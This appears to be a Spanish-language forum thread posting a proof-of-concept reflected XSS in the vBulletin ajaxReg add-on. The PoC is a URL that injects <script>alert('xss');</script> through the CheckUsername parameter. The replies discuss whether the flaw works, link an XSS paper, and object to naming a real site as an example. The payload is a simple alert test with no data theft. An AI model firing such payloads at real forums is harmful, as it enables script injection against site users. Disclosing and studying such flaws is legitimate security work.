"se requiere ajaxReg para explotar la vulnerabilidad"


El error esta en ajaxReg (http://www.vbulletin.org/forum/showthread.php?t=144869) sirve para comprobar los datos cuando se esta escribiendo ..

POC:
http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=XSS

http://www.site.com/foro/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>

http://www.foro-cualquiera.com/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>




publicado en: http://mentespiritual.com/xss.txt

bueno parece que te tiro un error 404 no debe existir o tener el ajaxReg puede ser eso.no todos lo tienen.y por lo de foroswebgratis lo hice con la intenciòn de mostrar como se podria explotar la vulnerabilidad en realidad no se si funciona en foroswebgratis nunca lo probe.

saludos!

si queres buscar xss aca un buen paper http://milw0rm.com/papers/192

Gracias por la info.
Yo anteriormente la vulnerabilidad XSS me pensaba que no era importante pero si la sabes usar le puedes sacar mucho partido.

Por cierto, no creo que sea conveniente exponer información de terceros, es decir, poner una web como ejemplo del bug, lo digo por la web esa de micro-games.com.ar pero bueno no creo que alguien vaya a ir haciendo pruebas en esa ¬¬

ale,
salu2 !

si todo fuera asi de facil xD
yo no se como , pero lo mejor es informarte sobre XSS
y ver que podes hacer
saludos